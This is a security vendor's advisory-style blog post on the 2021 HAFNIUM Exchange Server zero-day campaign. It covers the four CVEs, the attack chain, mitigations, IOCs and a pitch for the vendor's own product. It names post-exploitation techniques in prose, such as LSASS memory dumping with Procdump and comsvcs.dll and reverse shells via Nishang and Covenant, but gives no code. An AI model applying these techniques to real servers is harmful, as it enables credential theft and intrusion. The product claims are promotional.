Microsoft recently published details of an attack showing how a threat actor used zero-day exploits to access Microsoft Exchange Servers. The new exploit enabled access to email accounts and allowed the installation of additional malware to facilitate long-term access to victim environments.
The campaign was initially attributed to the HAFNIUM Group, but it is now evident that multiple other groups are actively exploiting the vulnerability. HAFNIUM Group is a Chinese cyber espionage group that is known to compromise victims by exploiting vulnerabilities in internet-facing servers. They typically leverage legitimate open-source frameworks, like Covenant, for command and control and exfiltrate the victim’s data via file sharing sites like Mega.
Microsoft released security updates on March 2nd to mitigate four critical Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065). The affected server versions are Microsoft Exchange Server 2013, 2016, and 2019.
The initial phase of the attack requires the ability to make an untrusted connection to Exchange server port 443. The attacker leverages CVE-2021-26855 to gain initial access to the organization’s Exchange Server. This CVE is a server-side request forgery vulnerability (SSRF) that allows the attacker to send arbitrary HTTP requests and authenticate as the Exchange server. What makes this CVE particularly concerning is that the exploitation does not require user interaction and the attacker does not require access to files or settings. The attacker communicates over a known IP or FQDN over an untrusted 443 port.
|
CVE-2021-26855 |
CVE-2021-26857 |
CVE-2021-26858, CVE-2021-27065 |
CVE Description |
server-side request forgery (SSRF) vulnerability in Exchange |
insecure deserialization vulnerability in the Unified Messaging service |
post-authentication arbitrary file write vulnerability in Exchange |
Attack Vector |
Network |
Local |
Local |
Attack Complexity |
Low |
Low |
Low |
Privileges Required |
None |
None |
None |
User Interaction |
None |
Required |
Required |
Exploit code maturity |
Functional |
Functional |
Functional |
Additional Information |
|
Exploiting this vulnerability would provide attackers ability to run code as System on Exchange Server, this requires admin permission or another vulnerability to exploit |
Attackers could use this vulnerability to write a file to any path on the server. Authentication is required for which can be gained by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials. |
CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 do require user interaction, and as such, the attacker would need to exploit CVE-2021-26855 or compromise the exchange in a different way.
Organizations are at high risk of exploitation if Exchange Servers are published directly to the Internet. As an alternative, we recommend allowing access to Exchange via a VPN connection or publishing Exchange via Reverse Proxy. This will significantly reduce the risk of a breach.
True defense-in depth means preventing attacks that have moved beyond the initial phases of the chain before they cause damage. After initial access and privilege escalation, there are multiple points where the abuse of process memory is necessary for the threat actor to continue the attack chain. It is important to have controls in place that can stop these non-negotiable tactics.
In the Exchange scenario, the threat actors will typically dump LSASS process memory with Procdump and comsvcs.dll. They’ll also use PsExec and PowerCat to connect and send commands to remote systems. Finally, they will use PowerShell, Nishang, and Covenant frameworks to make changes including creating a reverse shell and creating new user accounts. If the Exchange server is protected by Morphisec Keep, many key phases of the attack will be mitigated, and the risk of a breach is significantly diminished even if all pre-execution protection mechanisms were bypassed.
Other vectors of exploiting these vulnerabilities assume an already compromised network. This may involve opening a malicious phishing email to initiate communication with the Exchange Server from within the network. Morphisec prevents these types of attacks by using moving target defense technology to create a zero-trust runtime environment for server workloads.
In the event that a breach has or may have occurred, Morphisec’s Incident Response Team can assist. Our Incident Response service will contain the incident and provide visibility into the extent of damage from the attack. The team will also offer actionable recommendations to reduce the risk and exposure of the threat going forward.
Proper configuration of the OS and its native controls can thwart even the most advanced threats. Additionally, it is critical to apply relevant security updates on vulnerable servers.
We anticipate that Ransomware groups will take advantage of these vulnerabilities to deploy ransomwares. One indication of this has been seen in the wild with the deployment of Cobalt Strike beacons on Exchange servers.
Our recommendation immediately to customers/prospects would be to patch these or have adequate compensatory controls like Morphisec deployed to reduce risk effectively.
The Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: https://github.com/microsoft/CSS-Exchange/tree/main/Security.
If relevant artifacts from the above IOCs are found in the exchange server, or an 8 character aspx file is found in C:\Inetpub\wwwroot\aspnet_client\system_web\ directory, an Incident Response should be initiated. Morphisec can help with this even if the organization is not a customer.